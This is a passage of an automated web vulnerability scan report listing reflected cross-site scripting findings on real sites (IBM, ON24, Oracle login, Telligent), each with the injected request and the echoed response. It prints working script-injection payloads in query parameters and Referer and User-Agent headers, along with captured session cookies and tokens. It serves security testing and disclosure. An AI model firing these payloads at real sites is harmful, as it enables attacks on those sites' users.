Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:00 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000gO8IZg5GJQycWQPexUluWag:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k5090c"><script>alert(1)</script>1a96ced61b8&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.72. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the cmp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba58"><script>alert(1)</script>d98038b851d was submitted in the cmp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:10 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000iq7tvdpDE4j3mL0agZtqeQc:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=000008ba58"><script>alert(1)</script>d98038b851d&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.73. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the cr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af2a"><script>alert(1)</script>5ffbc7300df was submitted in the cr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:02 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-CXBDaoLY4nHCmAK6zV4PBI:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google1af2a"><script>alert(1)</script>5ffbc7300df&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.74. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the csr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d200c"><script>alert(1)</script>6c7450ed2d9 was submitted in the csr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:29:58 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000GCArT-1PDBlbT_LQCkC6TyG:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117d200c"><script>alert(1)</script>6c7450ed2d9&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.75. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22e7"><script>alert(1)</script>84e8fbf3eea was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:03 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000qQP8LaAzV4rqEyTOAQJuZm5:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="/webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GWf22e7"><script>alert(1)</script>84e8fbf3eea&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22">
...[SNIP]...
3.76. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The value of the mkwid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcaa"><script>alert(1)</script>9a515e2d34d was submitted in the mkwid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:12 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=0000-1-xrYLgeRYlirNuvDyhMn8:-1; Path=/
Content-Length: 67320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22fdcaa"><script>alert(1)</script>9a515e2d34d">
...[SNIP]...
3.77. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www14.software.ibm.com
Path:   /webapp/iwm/web/signup.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 439fe"><script>alert(1)</script>0ba8f26f2b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1 HTTP/1.1
Host: www14.software.ibm.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:13 GMT
Server: IBM_HTTP_Server
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=00005jmudmVwN90N_S_Y-2phUjm:-1; Path=/
Content-Length: 67330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
iwm/web/signup.do?source=swg-Accelerators_ebook&csr=agus_lotusone-20101117&cm=k&cr=google&ct=100DN4GW&S_TACT=100DN4GW&ck=content_management_software&cmp=00000&mkwid=sbqlaimsi_7690207419_432jmv5154/x22&439fe"><script>alert(1)</script>0ba8f26f2b2=1">
...[SNIP]...
3.78. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/EventLobbyServlet

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload d3ae7--><script>alert(1)</script>b0977adf47b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=register HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:30:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=0rvu9xpQXsuNNX5uqSg34XHsQnJPAPazjTKeFaBUv5dhOISD2nsl!865718048; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


<!-- optional parameters
cb            : leave blank to hide logo, or pass in appropriate cb value
topmargin        - default is 20
leftmargin        
...[SNIP]...
t 100%. useful to restrict content of two column reg page
middlecolumn: # of pixels for middle column. default is 4.
fyi: your user-agent string is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d3ae7--><script>alert(1)</script>b0977adf47b
-->
...[SNIP]...
3.79. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>a68788fd6cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername= HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:27:53 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=f3f59"><script>alert(1)</script>a68788fd6cd" class="boldbodylink">
...[SNIP]...
3.80. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91e7"><script>alert(1)</script>8e874b658df was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:52 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 29 cfhOct 1969 17:04:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:27:52 GMT; path=/
Content-Length: 8443

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!--Template file taken from conftest -->
<!DOCTYPE HTML PUB
...[SNIP]...
<a href="https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://www.google.com/search?hl=en&q=c91e7"><script>alert(1)</script>8e874b658df" class="boldbodylink">
...[SNIP]...
3.81. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/request_a_demo.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20662"><script>alert(1)</script>4f1a3620730 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/request_a_demo.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a57+GMT; expires=Sun, 26-Feb-2012 23:21:57 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:57 GMT
Connection: close
Content-Length: 66403


